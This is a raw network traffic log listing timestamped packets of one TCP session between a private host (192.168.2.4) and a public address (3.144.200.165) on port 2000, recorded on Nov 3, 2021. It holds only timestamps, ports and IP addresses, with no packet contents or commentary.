Nov 3, 2021 14:44:39.581317902 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581336021 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581351042 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581368923 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581389904 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.581393003 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581413984 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581435919 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581459045 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581476927 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581487894 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.581494093 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581511974 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581527948 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581546068 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581562042 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581562042 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.581578970 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581594944 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581610918 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581628084 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581643105 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581655025 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.581660986 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581677914 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581693888 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581711054 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581727028 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581726074 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.581744909 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581762075 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581778049 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581794977 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581809998 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.581809998 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581828117 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581844091 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581911087 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.581921101 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.581928015 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.582097054 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.604283094 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.604326010 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.604348898 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.604393005 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.604454994 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.604461908 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.730993032 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731036901 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731061935 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731089115 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731112003 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731126070 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.731132984 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731157064 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731179953 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731204987 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731230021 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731259108 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731283903 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731308937 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731311083 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.731333971 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731334925 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.731358051 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731381893 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731457949 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731467962 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.731482029 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731506109 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731508970 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.731530905 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731554031 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731579065 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731604099 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731612921 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.731628895 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731654882 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731678963 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.731681108 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.731714964 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.731758118 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.752931118 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.753035069 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.879374027 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.879797935 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.879816055 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.879831076 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.879952908 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.879955053 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.879992008 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880148888 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880167007 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880184889 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880198956 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880202055 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880218029 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880228043 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880235910 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880250931 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880254030 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880270004 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880285978 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880297899 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880301952 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880319118 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880322933 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880337000 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880352974 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880361080 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880372047 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880388975 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880395889 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880404949 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880423069 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880433083 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880439043 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880455971 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880456924 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880472898 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880489111 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880506039 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880522013 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880525112 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880537987 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880556107 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880556107 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880568027 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880572081 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880589962 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880599976 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880606890 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880623102 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880630016 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880640030 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880657911 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880673885 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880692005 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880692005 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880708933 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880717039 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880726099 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880743980 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880744934 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880760908 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880778074 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880780935 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880795956 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880804062 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880811930 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880829096 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880829096 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880856037 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880877018 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880876064 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880893946 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880912066 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880913973 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880928040 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880944967 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880951881 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880961895 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880979061 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.880984068 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.880997896 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881014109 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881019115 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881031990 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881048918 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881057978 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881067038 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881083965 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881093979 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881109953 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881127119 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881129980 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881148100 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881165028 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881165028 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881181955 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881198883 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881201029 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881216049 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881232023 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881238937 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881249905 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881267071 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881273985 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881284952 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881303072 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881311893 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881319046 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881335974 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881349087 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881354094 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881371975 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881385088 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881387949 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881405115 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881413937 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881423950 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881441116 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881457090 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881458998 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881474018 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881490946 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881495953 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881509066 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881516933 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881525040 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881541967 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881551027 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881560087 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881577969 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881578922 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881594896 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881612062 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881625891 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881628990 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881644964 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881652117 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881663084 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881679058 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881686926 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881696939 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881715059 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881724119 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881733894 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881752014 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881758928 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881769896 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881787062 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881795883 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881804943 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881820917 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881829977 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881838083 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881855965 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881856918 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881871939 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881890059 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881890059 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881906986 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881923914 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881927013 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881939888 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881958008 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881958008 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881973982 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.881990910 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.881990910 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882008076 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882025003 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882026911 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882042885 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882059097 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882061005 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882075071 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882091999 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882092953 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882108927 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882124901 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882128000 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882142067 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882158995 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882158995 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882175922 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882190943 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882193089 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882208109 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882224083 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882225037 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882235050 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882241964 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882260084 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882262945 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882276058 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882292986 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882297039 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882311106 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882317066 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882327080 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882343054 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882358074 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882359982 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882378101 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882385969 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882395029 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882401943 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882411957 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882428885 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882431984 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882446051 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882462025 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.882468939 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882488012 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.882615089 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.901243925 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.901335001 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035371065 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035392046 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035413980 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035434008 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035434008 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035450935 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035465002 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035469055 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035487890 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035494089 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035505056 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035515070 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035521984 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035540104 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035547018 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035557032 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035573959 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035583019 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035592079 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035608053 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035609007 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035628080 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035629988 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035645962 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035661936 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035662889 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035681009 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035691977 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035696983 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035725117 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035753012 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:40.035782099 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035799980 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:40.035816908 CET	2000	49766	3.144.200.165	192.168.2.4
